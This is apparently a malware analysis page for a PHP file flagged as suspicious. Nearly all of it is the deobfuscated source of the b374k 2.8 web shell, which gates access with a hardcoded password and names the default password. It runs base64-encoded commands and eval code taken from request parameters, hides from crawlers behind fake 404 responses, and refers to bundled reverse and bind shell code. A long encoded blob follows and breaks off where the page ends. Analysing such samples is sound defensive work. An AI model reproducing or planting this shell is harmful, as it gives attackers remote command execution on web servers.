PHP Malware Analysis

rtxcat.php, rtxcat.php.suspected

md5: 3c2f6a5d11700dadb18b06e5f40e8117

Jump to:

Screenshot


Attributes

Encoding

Environment

Execution

Files

Input

Title

URLs


Deobfuscated PHP code

<?php

$s_pass = "fb621f5060b9f65acf8eb4232e3024140dea2b34";
// default password : b374k (login and change to new password)
$s_ver = "2.8";
// shell ver
$s_title = "b374k 2.8";
// shell title
$s_login_time = 604800;
// cookie time (login)
$s_debug = false;
// debugging mode
@ob_start();
@set_time_limit(0);
@ini_set('html_errors', '0');
@clearstatcache();
define('DS', DIRECTORY_SEPARATOR);
// clean magic quotes
$_POST = clean($_POST);
$_GET = clean($_GET);
$_COOKIE = clean($_COOKIE);
$_GP = array_merge($_POST, $_GET);
$_GP = array_map("ru", $_GP);
if ($s_debug) {
    error_reporting("E___V__OG");
    @ini_set('display_errors', '1');
    @ini_set('log_errors', '1');
    foreach ($_GP as $k => $v) {
        if (is_array($v)) {
            $v = print_r($v, true);
        }
        echo "<span>" . hss($k . "=>" . $v) . "</span><br />";
    }
} else {
    error_reporting(0);
    @ini_set('display_errors', '0');
    @ini_set('log_errors', '0');
}
$s_auth = false;
// login status
@extract($_REQUEST["f"]);
if (strlen(trim($s_pass)) > 0) {
    if (isset($_COOKIE['b374k'])) {
        if (strtolower(trim($s_pass)) == strtolower(trim($_COOKIE['b374k']))) {
            $s_auth = true;
        }
    }
    if (isset($_GP['login'])) {
        $s_login = kript($_GP['login']);
        if (strtolower(trim($s_pass)) == $s_login) {
            setcookie("b374k", $s_login, time() + $s_login_time);
            $s_auth = true;
        }
    }
    if (isset($_GP['x']) && $_GP['x'] == 'logout') {
        $persist = array("theme", "cwd");
        $s_reload = isset($_COOKIE['b374k_included']) && isset($_COOKIE['s_home']) ? rtrim(urldecode($_COOKIE['s_self']), "&") : "";
        foreach ($_COOKIE as $s_k => $s_v) {
            if (!in_array($s_k, $persist)) {
                if (!is_array($s_k)) {
                    setcookie($s_k, "", time() - $s_login_time);
                }
            }
        }
        $s_auth = false;
        if (!empty($s_reload)) {
            header("Location: " . $s_reload);
        }
    }
} else {
    $s_auth = true;
}
if (!empty($_GP['s_pass'])) {
    if (strtolower(trim($s_pass)) == strtolower(trim($_GP['s_pass']))) {
        if (isset($_GP['cmd'])) {
            echo exe(base64_decode($_GP['cmd']));
        } elseif (isset($_GP['eval'])) {
            $s_code = base64_decode($_GP['eval']);
            ob_start();
            eval($s_code);
            $s_res = ob_get_contents();
            ob_end_clean();
            echo $s_res;
        } else {
            echo $s_title;
        }
    }
    die;
}
$ups_1 = "http:/";
// block search engine bot
if (isset($_SERVER['HTTP_USER_AGENT']) && preg_match('/bot|spider|crawler|slurp|teoma|archive|track|snoopy|java|lwp|wget|curl|client|python|libwww/i', $_SERVER['HTTP_USER_AGENT'])) {
    header("HTTP/1.0 404 Not Found");
    header("Status: 404 Not Found");
    die;
} elseif (!isset($_SERVER['HTTP_USER_AGENT'])) {
    header("HTTP/1.0 404 Not Found");
    header("Status: 404 Not Found");
    die;
}
$ups_2 = "/webshell";
// resources $s_rs_pl $s_rs_py $s_rs_rb $s_rs_js $s_rs_c $s_rs_java $s_rs_java $s_rs_win $s_rs_php this was used with bind and reverse shell
// use gzinflate(base64_decode($the_code)) if you wanna see the real code.. in case you dont trust me ;-P
$s_css = "rP1nr+RQv92JvReg7/DgzgCSwBGY072WxwzFnFmMhiEw5xyL/vJm9yNpBNgYA4ZZ6GoeHnKTe+//Xmv9+nRX/1/+97me//2/q4skL9b/+C/cNO7FuP/n728u/vUfe3HvYLZt//Kf/u3f/7t//+/+1+2/Jus6Xf/4L//4lzzZk39thqQqwHms/i1NtoLA/rfGZ03nglSxmph3M1yv/njVu8f9+ZKpOCZ6f2OfYlyhPwe4kJWDUH/3Nvd90z6V5KIhSb37n+jTf2zfiS7KD13oznynBR6yO/FdwHWrNCeYqTqBVSfbOgTmd2+72mWB1Iq12WZJdh+tfifLfmNUijX8576b+AhZP98/nmNA0MKzevX1zGH8fvQMALMCy/EM6GicrOKPGnE5zrspupvPCeQgCNUZw5kYWVebBpESg5e8XPLdQ5TlbTNTxVdp/5v1LP7NvjxHTkvwvu/H0PN1WYP7icI5YbqpZwml6Vt7pjC9UsePajTRZGQGUBhUTXwPDn3anP0E9NeQtt0eFom40sGxwS/SAJtjmtxR12P2vWaabd+ASIIs0LLfYHWe+ampWI5bF+LoShKoXDrT9vJbo6PC+A0drkD+5dIS1r4ZMxhbijZpG+YojV0Wb8PlB/LusnpExuZsmWlyKKg36pD4teybLW7jnuJnCEfai7Lu5HksOvvcDGJlUjXNH9JPyIj+HbFD1jJv4dihty0JVz9XEQDmZoI/511ijXp0SSO/1ZxMJrpuAQOsk6VkVqAPqIAQRmCkPv3wtsMQaIChT5CGJVLoun0xkCE5ZjJNmJ+nRVTd8eD9CPeIv9bU3ns9qBhhx4UHBzaeIyZ2ozrPYMxb1WixCYU107K+utCujUiTGE2hyqdEMhRV1VItBdFgB7fd7xpRgLGn1cW3AE8SWK629ggoCmH8rXPbRhBV/2z6la65eh3+77YngUKKYybKM2sqr9h8hWT7dgBGqCLO9B4zWFK1dY0FhpO67QevNVuV1kmXAdymHWUWlmiBaCkXH7LMpLv+2TbbtGZdWC16yYwkr+kOguFwFJg0sDhFFFJZRYzqtuD5gAWjtJrFMBjfT2PtanNB+3653SLzE3MqpyLCrLxuVfKaUlhZdlpLMCPY8MkkZ2SjcjjmW5gqR51F685xueFzQgGQzniiq5POMPZD2MdIDg4ks6kXxcifwdVb6UbVq3O9+Tudn/feVHXZncUooTiXyBDbTA0rDzubfShyktfWnBsAjykET5pXRPERnzTcCt8dx9t1xMnXFy0wSmPAEDbb5aoepOxWluCAvNksP5f3Wf1SINIrCrghj+EIXDquaAhrgCKnnr52Vy17Oflz7kCnqNeXKk9qLHeO6yjN1DQzx3el4nzdCfaS09fsqq1F5AoodNwRqOqAifiOHmPfBh8hVqVH2IX8almravaX7BTUBpR+Qe2Rflxd95O5V0zHlZzsI9sP30Qx1rbmBZpUD+S4RuW3tH8zzUpZfEjpB3IaLIGJ0yfj7TaSvg92f9nBO1Dv5m5bSDSUAtIOzX307z2I5UmBO6AkazIfaYAaP1L7kZL43USURLdVpXobOdB4REkvY1Q20ix8D+L9eav79Fj+o1NFxQcNHMxwGn5uPU6NNb8wT1l3edGGrOghT8nPlorfVrXB8o/zEwh7Cjw/J5BqMiKMC/y1Ta8Y/ewKJu5k192KEjY6OQz6ZT7136xxYJT7Wgel1ZRl/rQPTZxJ2Vg6LTEBS3Yumu4zsvr6rECPcy7qTPwe12hZAwcrkEM9jS/kXF7tPw7AKo6Hf9ZOqarqv/yXf/m3vy6TJ2v3X7P0/wefYf5YB1P802f4J/w4f31GDB0hkJxvisRQjgi/2GbZWKSb2GWVNBDG2Ff6KHDwLOt7688Fbq44H8ErjHXrIFG9WiaqY0NZorOxZ17VzCxCN1OQBZwXBEit2iJiruYZ+MMwbykTVrFvC3pmYDU1zGWrz7FGIh6nTmIg8bdG5JxrmA6qdlzIAKTiU9ukeOPrdjAPs7vqNt0U3L4AeeQ3V/B+cGWK3UuOcdRtEn4XPE+FlrHt1UPJp1q4ixkSbMR/NQcwWeE+S84TtMPwwNMWucsWiwRiXNkwJJZWiQhMqHTbnuPAm1m14zLr/AlATRcr3fz8LIvurj6VE7syNhPHRROoU6Se0XOUYalHwvhL3gVgKUYaREGV/ZKJ1IAZQWos+RVznf8sxe/RE2iF7KiNoQJ2Jnnu06B3hiIGCpUIQBjwER3mHKM3t+eTyEBbJaUCIXn0H7KW+9Gm4O/TFKxTMbEkgmYhFiWh/w0RruebjopzkSz/93pJ16aq9/+/Vsz/STJhLehPMrGxtkC+mze9bsWJJz7QqOOwGivbJmiYQiUpCdY0scdfhufelAJtuMsJXaf8UB1PFLa8tHUgJxmteGoLTBoETOChuiPHGY5gOYDz0hViW4ql2f6RRBVQp1cb56brvW4mXd+juUbKCpPO2e2nTnX7EfVQ1zUjCD5f72HSAoA7sdVh/ZF/P004WXeIhouveJfrdylDtg+c+rRPsqVzpf1966Cug9VdLEPndsbPbji/miiW5QJ+HLs3XCwLqplxIV7ARy30hTEBmqYMomR+Gd1KVsXGdWiFFIeG5luy6AKUsHzXNWp7nOUaae4UTopUhBpbyM9pnLZVEfpsydLoj9kEbUEEuQN7jXPVgKWn9858h1SoBcQq742hU2tfuUVuFPkJvN/oG8JcY/mvtKgy7TNpznv363Whr/jOYjn3DRg4W/K4KZzhrtEt8/9Zbf7Wz14XQ/HP2lm7f/m3f4DgP/KiTI5+/0ez/ePPwX//75ryPzbbVuz/8X/9r5xpqvLn//4f/l72H/4f/+k//eN/auP/7dv/h6S9333zc/L7j//yv0B/t3/53/7xL/+L8Hf7u4v83f7uYhzNMf88Cv/d/u7+7QTzz3PpP6+/uyjx5/XPc+k/r3+28Hf7u8v93f7u0n+3f7YA/Xn9zfb/Yw39T4/4Pz3X//S0/N/t7y773hX/59HP3+3vLv53++e5xJ/XP5+A/vP657nEn9c/W/i7/bMPf7e/u8Tf7Z8tCH9e//0Rs6mf1vcJ/+N/H+53Cv/52P/yn/73f/yPPvzrfxvu/3ZRXWRdOt3/36979eNf/w/zea/+3/+vf+rj/1a+TPSfyyQr/vH//Pf/7h/v9t8ODE3/+9d//IcjPcb9+K/DNE5rUR19sv6Hf/vnedua/es/jrX/j38lKZnnvsmSvZlG8P7Pf9u4prL8t6xO1reu/suxl/+Z+u9ylUO0+Gof+3e+xUBm2H+K38m/bzbzf7KxotM7xp+d5e+X15/3LDYBKf/kH8f7I3PS589B9U873MXJ10dxYNby/pxa/m3k9+fN5kPzu7KSB/t/8I1T/hz0u/dNFnvjVJYP/dUe+f3a/HtR+Kc9kYt9+xtHCPwC07sBfzvw5wSWqDitZeM2H+0/wiv8/f7njxyz6gfqzAyJrxj5o77BX5nd/rQ3+N+dA8YYEZ4/57Po31vJzH9nSpYdU6kf/nSq+PN4w9s1NYDkdUcssX5N/W1EQP/e6u8I8hHzQzQ++fO991th9c/x+fOmMMvAWvSUhg72Nlyofw4Gfx7VbOpBuDnxPiPkbV8A/jwZ+3eQctv0von9hgjsTyOR/9dTqn8+pCwytX9EAdy/p9fF30Ha3jfLjPpCXUP2zNC3KVH702kW+3PVbm/s4umZpPR/2ouNv/Q8/u3pYn9PEUfjQHn7y/Z/b/LXthgx93d3/nvg79QyD480z9+u8QqektrfgzqpK3mPIYNRxSJbYYzRCHZkR6JSsYdMsF0iFlMsyuqhYHZgP7Ya/BkjY5B57U+PpTaJELaLRL6KVrbeRKP6Ltj2Gz6269LqEyT2D3ohJ7DeNt/xaTUKvKhu08S/M9ddJ/mnm8gYODc0v7bZCCewwVqnXIJ9NvJU9XRdv1fZLivqeigg+EdUda27GpSt2cbdSfKCSGsKsI38yRqhgPV0VvYU4SXeP/FG6hMjINLZc+2PiF8Wf+LhZ9Jj3clZd9VFS9tYol09e3kSrxPsC10I/XOSwpEfMQULxIuKI32r9OLrtq0W6WqYA/zYmNLWO0u4DfAU2hoUXlmmqTtn67BvjS5mnt8mTnMo1lx/Rv7kh/xWcrVIb0jtEzMazoBvWq/s882UWNdte3hZznof1FUo0W751gvsm02GVT8bn4Ul9FTciAVoDbWvxjUlE0UAVowujG06Df6m5YRb058D/w69z+ADajPU/Xr7HsW3YT11az7fXaEV4tGONlnnu2DwJLJtW0SIyO93fyOS1LTXsLMs2+xbwe/f3XZhKGmC8S3fYxnNgyr6RZ/f2mPPpTpYYSbCp8fxDtSBWPpSjDj67vL5W7Z/62kkWVMW2T4ShdxJVt3W+en5feKVlDs9/VwvjN86qv6yR7z150NNHEuEFFNBMsTcLmZaE6G31UVZ+BB1J9lTKXNpyWfxALYKBEDkDJt+kuBdKT1X3TqjoQRPYv/j/pHIDpXIxH+q8yNVHM6LHOBeuoJxkDTpXKd7Umx9fj9e8/TyHnkx2SJ+FfNPwbqQ8LG9mf12gmJ7MBtSgir7eN0mqkvMYPm1QLCCIG7x8yrQmYgVQmviuEpWPxUD+yfnlxYnvGdZ4AoiJTiCFwhq4HUCFFivwCnhN5ZZLVvZJSkBN75ZFntX2SqtNrVpNQgY0QoPuZ3jMiMaXRVW7jNEzOeDT9zE2Zp6byT7y0Ljok6JBJhJ4a5GbaJDdrtec/VV+VHVorrbtCzDuojznCDtQhTnJNZdKipLPOB1Evh7hOxjivATbj4N8drWW1M9WVgrToO2yNrZp55eCPzEggN9xTsrP0rz6QzSgUurV8an/93FMT5x0/urv9D5jkj03cHpPqD5OVoS2qIk3ereTMQ9muyZr7TPzv/SKdQR++p4G4rexRngu32t+VP0uGxFRRiiHX6mcX0B2YES5HdD0wNvTMn1sGzkHYoudeGbH9tpI/vpwg9cY8sXSHI9njciN7CyRqxP8xL/Ir9aqEyJfv/TCPm9+kKvqDP19VqXvDF9xcuMIzML8xEZpWOmi5sY9WI2hkMYxWMmm3uhGnslnfsxUvdaIfdl1Ilpba5k1IjJL3ZnpNciL/bDOp+/ehj6Ivntd/ZjQAZ/mextVJWZT96GD/Y9HjVrjx84gpuYPwTcrmcDVZ0G/bASxLEOgybrPVRT4sjDFdUCVFN2i9Wf1lgbVYbM53gyioh16FS7ZEaJ4LQ8IOs6XXsjP4SAHi7vqc7QxHclMETfZV0Khnug9RkGQExj59Pp+f3N6R6d/jpL9CCy8hdoBkkHZBYRAK+SerZo579f2rAJruhq1kzSzDt48h6NY9ssYNJ8LJAvXXWj+ZAPi4hdcM0gHFm1TQscKP3x+i3hv6/DeMi+s8oKwJzkU+jHc3Fem9cPMijND2zs7xWFSi68fp49GLIJ+bZaUyTryxN9JEQ3gsK+Cr6iBsFQUUWfNt6RkGg5PxwrfiVmwvH8UcDFYQCvcu/1Vtz2bOvVE+9ZCi+VQb7kuwSV/cVSKr/OOpZ0AT3vXjPPVq73KfoEMhk1A8N5Duf0IV7Xq3W6l4gLGvlAnFeZ4d2iQM5p3wP52FRP+jDfCgEnzQBCP78ftpD+OpoNpKApMS+LIc9PuRfP+ufPg7GCoww2osT0AU/AnSTC4n6HIVbmWxyEga7gtIZLox6U8BA/hTbBzZ/+Wak2w4IgxfBom5AaZJTs2fffjHiwH6CZe+vMQBALQyD4vSNIXaNGS2PKWH7frSQaORwm9NoyXY0zpxvJt1LhJ0wH6ddgUJazxWRueiOJUwM/UuPZqsZTStfTknBrHo0e5bTsnyJdX0d7qT2Jc/d3vjVqFVkMpUBjIjaZpmcBgCeNx4n0WOojjWaG4w94lK2ZmdeXtfhNOaARiTBnA72fbDs+UELDzp3dqvyhxBB/qsBq5V+NFXDBNyP8Q4idnyVKqlWOWeuJZbeo2bSGau6rT/f5ATEL3yDtES73q2GQc27WBpFfbmwjf4lCZuRv0T1iXhnjuYu69Nfcws/Lk+AL8PkBf0VxEC9XaYKvKhyCm/dStGq+YrTdpyHS+I03Cl11DhrH8npTjrvOWTtDUzIvB864EhsHErHWP5Edlf10ugyGmiODndU6pBmNF3bYUuRYVxK423wXi2oZESgSSXj+Gg+DVasdH4yEWAVszpP7Wl6gz2zWW7M3KtHNfnBD7SDn55kTBhHfD5XKTsKLqTJ4Y/OVtE/j5tV+8l+vx4havy1z7Y4fbELnMEG0ZphkYA4IeZSB9UaVkoClAlNwoxZNTMDkwuJiLh3iKwQU4Tna3+xzy8jiacer3gAo99gI+dlOyGOvPdh9t16nVyWLCvLRSnnM7tUobe+Gsw+lOIH+DIf6iAnmuI7ahUoBSwije0U4Ruztkd/3FoXI7mdmzFo0y70Z4Ncx8UpxNko420YmzOdlGG++xNduVr89dNYo3lfz5+N2cIwpdEoRzwG3vDGMQvug7S5RstXhWR6vNGYaBhtKKcnxWa5ZTIphpvYqL+4CJt/dFGx+wB8zExRXhmGlgqT4DSkeJBYdbA5sXmhsLLUmLx9sAEUVayi+UO4VEzqTpS7tpwi/EgoqfFpB14aLgVNIc/Cs601VEwqaHwvSkPJzMkT2a+mEBnuS94EZ9MeCSg+gpb/AMALS2cRgAOIuJP14A4B6yc5UEIwChcG8LMky0GReiYybXEICfKIX/qtM+NNVs+cvQdeGWcwRvR0kQ7fxutsLSBJ8mq7tQ8XBocPbGawv5O5EGsmUx9lhTgWT+HVxs0rvJhealLDBWHjLWYq3LmlV+V0xt551uuUXpL2jIqMa/zInAnq7dg3uFNJQxSW8EJTKA2NNcecva5IWicljHmT70GV9NdKJy82KsiLW9ye2sXsRQbhSDbMLkb2ThFirM/TtMoEgyMqTfvkU2gbijFYpDVeem8vWfUO6D2LJR+cPVFi5Q8j1oJDvAGVcGyKxsqLp8tDAYUnOCgBvCCkJmfTrXt6HuOW74IlhbUV78/D7x/avuiqJ4WfFhVHXBIBkJNvSyCgNJGgrMtu3SqSUoPOQY7CzocsKhQ1eixvp0GPW3FbxHIgPchy/Jeo8NqOyF44RskDJNT88FjeUmhlCIo0AEyz/UNHAxy69KLPBk9HG0VA1bujsKRO9swW90ztjaGAh+Azn7RuhInn3EVmAY9VP7pSPUR3rPoGo9HzfCyUb2aBeJXe7bawGQL/chtVPRtbuzwlnPA8Zl9faUExFquSO1d9RNN134odp8VNTRApXbm1/OV/Quy+KXp8PZqa2dAJKTU7ZeJ6i8fnl5piu0HQkOQ+hGQ/uCFks/Amd53i2YgRTNJXXrULb/KRKq4UuWgFJmv4IA5tbcir6Pz9jADXW1N7WQpxJDUWRAi8PYJhpiMjtFji6ca9f1R/qXSlLBHltUjGecMgrlotHyj0Uuz8Amgzy3lHTL3qZs1rjtpW8NfVnBrq0pgTnV0l663VvTRnBtQSZ2MBazb4OZbfGztEWM/sscldC629sL7GZWF59QV5XAHpa7ZTgkRNpMJPrHsxPgTZgTk/f0ROOD310+qC7DlKjah2YRmsVKJq7FAmR44qpyyBjCLw8J7c8OZIvX9fALag+aHR37p2ka9gm3F8SGDwIGrkBJeRtPsB3P470jceFxtFxgL5rYizCPz9DIH/wGCLWvpRnDO6LQZYh6oPpsWIa/NvxUdzbAuLDAe8qGQ/kZZ7Grgsdqrw6MDVMFS39mf8V0Juz6gUSN1iUgPYGHpzMp7UmHxKZGBqbRlPKkFrXeTDhXUalu+1Dqfk5+cWjpU6Punrp+klyxjuI4YH9IselYQtkpeSIP98yyuS3pMQUS0zBKp8Ug3bDfUAGp3ZNf2PDZBRIE2vdlABcwh9BIr6LK1h3OZk8wwe9NFNH3wbK44h6Eu/Ce58K+CqEp84d6dEb0kKPOwGrSSyR8EpBsp2+oRTIMdnw0Zj4uuHXdTI+7TS4mKqU3CYK9U/1xCtOw2D/+V580ycbmmmFzDLtAqsrwROfTg5TvA4gjzA0NWJcAwD/87bUzl5Up7uJPiXxuOcPsofIqZHylNzd3MJXwMHY0NfYc1/ek8LwgU1EDoPHya1ufu7Cmp40liSltnyHM4uj1LMldPZ7K68g2HDoKDLwc82JRCdbtTtwcMY8/DULyyREu3PmL6TG/dXhMjIEupz0oRiwmvaxI/BTYf76Gbz29XijGUKES9nJ9NVWag6HoUAdTyvnZ0TmPmyvxOesZds5kwidwVpFjTVnFErSTz1bRcrrEm7rEO4GVfx1v4a6V1wHeaZt7heNx9+stpsZi3zhbXNkqy8Kz8x+fQyloZ/vekhT0EsQ012RGzkpUWvBvS8AssYIlb8CFFFx/YISXIYfc92R3ShMfnQjQoM4nBuRGbms1ZIXSaV1WrEw5+caKm9W56tVd1WjELFw4vjlTrAqimLt3LJBkUtYJddgMcFPbH/G18m+K2jJqbj7cbw7tL26n8u4Dcyw/qzUxJfUfJZ0eFYU3unbDdFS02I7fFSJe7ODXVzPdOCkyeI5Bx1VsvVq9mKbtUofV/W+0GYtuwHQIqRyjihgjQAw4Wc82N7utef7ZV2b7YupzsvihZNrHXONplAsRLG3jjY2sKoIW2NbrXAE/3aJWY2EO9hlOiugWSdMHzFt7zH7HbtddzF2N4QL9rH6INTHoKKTzRdV9/lu812owCGIz2s7qjXd0yHI/mnOpubldppCW5/amlUvc2QSTzwdH933+4i+HpPWQABkjvMsU44igJIOvuSAn+SGkw1Ak2KuLrUc+0cs5/UevuNSu0VdgkBzXsqSgwQZmfloF+Dp+zQJ3SDxpspcOshrt1rdZJ1A2ajEMjPmzU/TVGEOXcwVK+8JhnxNF/Hj//7Ltl76qlLzc/hmKn/9wVFdfuBlYwu+I00RYEGSI7pmbXEfxX4S8n2dGA6Ae2Sdz4TcB4zcqlKro6V/jBvkpYYWrHG7rTNl9HnqMsoReNgWRC+MnbPK6u30KSnnjVQZ1Y/60jVWMawnkdFvU77mHLHmMjn3Rkfl5PwQMxK3bbm8TxbFFQrM15u/Q0lwAr4aNY1c8KD+6sOByWsJ2+gfdOMTHKeVPEccLvz93uBZlHhf+2BY7F+t8B1KgdNUgh7Y4GJj2BFECKQR+JoGfVzRUxVkQW5cBAXoZp3rSBM/PUdLVPlquxpRoNi/qsOeHWFzup51DLGQrB7MTN/MVysSthId+Fwp3S9RBcxWEwgGvOnHau22aFV9cYjfmQRkBTBXYb/fIyvMxO950xHL0wmDc3Ia7iPctxRMJ6k8U6leK9Onr/i96djG5mHDtIowBJesMPEmIyBv+NSiLy+40RJSPhFZYHHbpuKzIzcRsmVpbKOB4T07ajy2pMe8VY7V4kSMWuCyyny+ik957KO3ks6lzR8SIFeDhkr6BIX+mazUx/s8HR0cUZLoi422gm2tYsWX+dUbjYU4tYoWuB/brhMzroZeXXQkJglVpTvd8XaNSmAg7oX21jKXavCXffhIFDJpOTp94rqm+SXyfkeLCWouMx02Br2du/Ul+1wTxS4O7/zYzuhuluF1EZlqUq3z6DwyQOMXjSEQmMuw+BF0ufKXIXYEp6c4ZeQmFI5xC+rc/kmi8DFxTxIKkq9ObcB+JGl+SJ45rfkX3oniZb14VOYgq+vSg4cq+Voun/WiKRZblaK7giO0l4qTA2c2EieIVCQgQUTg9g44rraGfXj8MtG3MrlRJdRDOsf1NuwMXKzbxeOcM6e9+gFpxWu3gjaXql3tr3C389A3KtxDVmagXtvBzX6dqvu9Zca+48C6QX2/6yDiMF/mGIDlvj80wTbRJZn5kCo5uD4ihyf9LUB5VfIsGSFr/4QekwH7ayHL7szIBxVmdUMHtmoKhKd1Dg+jzkCD3dF0DR7fkG7CW3tGFAAK/BiVtBGAK33XNHggm87qb9gax4j7XsB8Dgz1VW68jgYfi7O1+R0ZC19IqmJf+XTXSz9gmDWIyppZNBGjQtsviXHQTQcqvQm2XoNs88etRljLbMHbsxebBCba7tLLhohE9aeyO7zspSzjO4XLt7iB+B5J56maQ/ql7Q+JmLTCq2gObrUBxesb0fcCiIpn3a6dADagDyOLFAlKp0zXhSgHxLydFN+AcEiaSaN9ghb6/vVKJIfFUskI/kCmL+mfjYnGxK9/NCaOxSp4E2HYl6vfaKj8caim4lfDxb7SNWnVxLUMEygsDoveFb21XndytHTyrI5s0ijSZP8OKhUTj6O9V44hFEzDGwKz4lWMB0s+UjDi30L1L3y7HKi7XMcwe0Q99p9o2dpDXP4aYMT+yHjCHvqQf8RWk5E98PYiuKDVnQKGy10g9LjY3TP1Strn1aBGkL+XjJWUJh+R4Yhw0A0uS8WkEziwm12H5uuEiEXzvcStQrDnHdDmGoQxOkJrlhP7SEUiDeFgcJ5W+1sXsJD4ToCXYwaPOAGBQTLH89VHAHmH0R3zMWlr7/BWsM3FtW0oqAXzgeA9M5YiQB1Q/EedmzFgyXMV5yr3wRrcmUHao3hS1UGO0yVaIOXsAPHl3CyxFRwBV+eNhkaRpYIjSIU7f77zolK1JxWpgbs9n6X64ClxNKW4DhvaN0uEpxNJhIh4cvT6TygZSwEHSb/ia8gqwvB4fWPzyZzW7e8yw14Uoe741Xb+sb6s3hzBF4OyuDgkEALrzBRt8ig/HwjcgvVsiQ/qbD+2zQk/9oE4UEcp8yzTCb9ZAJ7DGylITuVPBP+AGXpOOfucaKskuBQI401XOZ0MSDnFfsamqCIyX4N6YE11eqXk48VVd73+JfFnWdTP8RO+oDK2PebiVVjAiHLldThvn8i9W2aOKE4KU8bVdxY7+aI8w6KPakPxXpVMCtfAxluSZzuDF1TCO5x/MxdR2G9T66cYTGdYR9vP9evr5LXRfniUHQ/dSyXdit7OZzbopqbmk8XtYPYvNSRXz/g6zDTyvptFRRflThka+SQ5aC8NW1w8xuaaXXKRw9yKKle5WzRoSBxALn9g6Nr4B5fpFsVkyerBr9wrHzOLWYucsxNt5oeE3sIc5PauIgWaOd4BHpSGnD3jqHowA/6NY31m5IGguMtCmww9EVp3/hrJbUoJiJkyFIu1zeIlVOdJ26T+VxkXzv98uKie+voqtqsfysxaPNDyoy4kbbe4H4inPYgb1E419NuJrcXjY1AjiHQ56eDJ4Ruzh+dIX7faSBx6uTup86VBJOSN2IblWSzwImOadUmbQgZa7KEAz2IO4UieIudJ93H+MdKfEgHbduodzSCmVoEkKan6ZvyoCFiqSaM1ZxJnVf8N+4sI0rDrxHEy3CTb3Mk9zCLO78oOL6qarnXArxFivmsktiryOgzqRqe8XxsXcCGLsnVQJ4rAY92tdt3yg35z3DKdEgQxg0gar6luvXrx5zAwMrZHtPZ5rYW7YEmqKp13+j3NTtpi3pBfvj8ncKXNN9f3XwjMuwRE7HXDvHbmiHIbqcS2MwmwEGqVGjEF6a9rRSptvTLPt4D6QunPOM6PJXAoQpcH/Ixb1KUtDd6PpW8muPb4AlBlmEIoDmAQejJfMKGd/kEdBJx/Yg3hApLj08ko9zaRAsCPKfPTRv7OqjtpevUrBOb100yKjW3l4uy6dmJHrwz9Jawi8AQleH2+NrBfocP9y5hQhlDkR/YjSDdqDWlrBddeWPvmkA+WX+qj8AD/KTxhCGRLR3YCdZVJ+9B0Sh9gSrE3I3zr+fxxoWkQIc1mw9iixABT0w0hVKxhFQFtutd0Z5/xPnhI5Q7r2wXybS1+2B/JU6aeL6QmKiSJvpGOoeeilPhyck0h5Nr7BW4xXnAq3/OKAT5ocId0aKMgTx3yjiK70MdDWUlp5Z7bZy5lc334SvIpBj04ldJtaLhGObGc2hlodB7qHlZshEIyWeNw6LCbV/pPZRF5QKDbsKdW7fiwZUfqwmIsSpsm0oE8AIm//J7TZCI5Czj5fGB2nNk8+ycrcmCb18w2Fktyz47rKA8cIjB593/JbnUFWUOZEieTgZanfeSQplUsobxaGhd4k3FwjrJ5XTka/RObx+qWSvtoHMVysOV3H2JjuNc6pa1m+e3S8j6Ra+2K/Jy1iwDIWSm3Pj7M3OHBOrpwe10Bx0k0W9iqOCLGWfOH1U8XsT+0iHnICxtnQ8j0UCVEB+Fs0ES5teSVR0O5/SW/AFz4JE6FwXdlECpEqx3Kxxhwc8MPH9A7Hs3fUwshNdLDN/xTWm81hLZE0hwV86/j6xLSlTjmI6eInaBKGZaVjO7w8dPxsVwElooRZYr8NbEwpqfvt080yrEYpcgZBbZ/8CPi2eFKHkEnWK/RuFTHRx4xcKPIQfaC+7JzXyqP+c2CYtN3M3P+fZnBQrprdeVoLoD9RyDFht9exGQujO40DOiq+WI8rJTpSewz6r6B7670fA+PFPuh5SGN1RDpOWmx7fmcueR41r6WW4nOE0nqbR5JS0UL8o3opSc/hLbzCiNF6/v8/gh5waH0BJIAm+0aeQX5eygLd8htDPu1jA/TD3GIUa76fIQi7+6v7T5pNQHosFRjYbbVA6JUThYTAWY7LStKeIjktoPlg5ZcJ2X8aIOGjz7QeEorePzIVScP8JCBJ70+ZIVftoy0Q/Igs28wJUFUqwnLLJXYkM6UQ3NPmxgctjvdqjg14tLtsluavgornCeOtRP1bzK8viRoBmW3Z1qUxgZFkfV1stEU4m/hgITr+npFLDe+X984n7DnQUYSjok7hwZEyc4TigGv5Jsxiswww1a6dnq8/spfpY0f0+VMPfp1yvCTBWJf2TuzfxMg1HdrpFB5ME2VIA2xbqrcLl5WvZnafCYdaVj1e3nHp4sO5q5W3+fKhuuFydOm0LEXXjEbJa4C9Sf24iwBT2eVR2rhbb25+Bw2hBXuAIIrDQmXhIrv+IeWngozrBU5ewcCgPT8WjYOOtlQb0ZDgHeHHRpgGDgLHuNjbutL8dIOhRKylDCvwtxG9ZY9/7pYGaj5cbZZSMd1sBlfTlnZ28SrGtjjSyfMt6lN0c0or9BudiooqChAiIgU9h3X3s1Teor6/cTvLyC91LznKokWtNoccuotLnfSFbHx7dzmLRF/e3evm4VVokE055FSFuy9h2ZgKF9mH5G1uRI8qQMAfjyJkmTdohNlShoVisnnZXz4KlEdNFdR+DGL9YaWD+iObMTXa6TrYk4bLgrjhQdpVQ+oC7cNuMpqc9N0H52JDDk3eo+Erzc6oIUJr1MkbY14Y6l0ktpeWcBuZ2WMU0BpvudRQz0PCQbCpL+uy4ugM7i+v/JkaPjQd+ZF233+OoZQb5KOE9eV7b12tYf5In3dEF7TGWkS/dL0a/QAflrWyox7jXrkiUjBxEonuDOpAtGKxCVQ9vA4SoJHCoBy71Cl0nIroCWwpWlCiD9vlu2gilC86M0W5bQcHKRLKU2LNqFAZFud57Uglro7ax1sILOnjy4Dc/TlRj/6Jl3E20DRQqfNRWeLdHzMHcNwM05pUiC63sw3pcxVO4HquKHTpfBLTsKz7NY7ndJkcHO04kZNk41n705dGuinwC91TCFL+aXAkopCeumt+2jKzsKM1kTTKUFd7IbIx/KdNuXqb5N3uYcSY43WJbI+KPi6v2jj8bH5S/m1rNCGiNuckdzqzF35ED1NWTKb92Xt4JklZOSmcL/7k7+FQQFXW25qen8LjXVeZNLLS6mqVgCZgbPzExZz9zJ1tIslDa8GPY+4UHGNuRtj/qCJD+fGWoYs72RuOB3GtT8KtK8Z8MzJusQhCQUGbXAA2Zri5yRZ665SGfiMK0hqF/1oEr6aH71MV4DAYkGhKnixcaCALcs/h7nJhKD0wtJuQbd1+tg2WSxdCmPQcqGe0X5FzIMf/AZ1sbB8Q6+ux6QwcTtr3Qp7Fm0vvqqW5g8CFLk1hx5sHBB+IueDrVvyhM8F5Wd7Iern3DZjtMZ2++A0R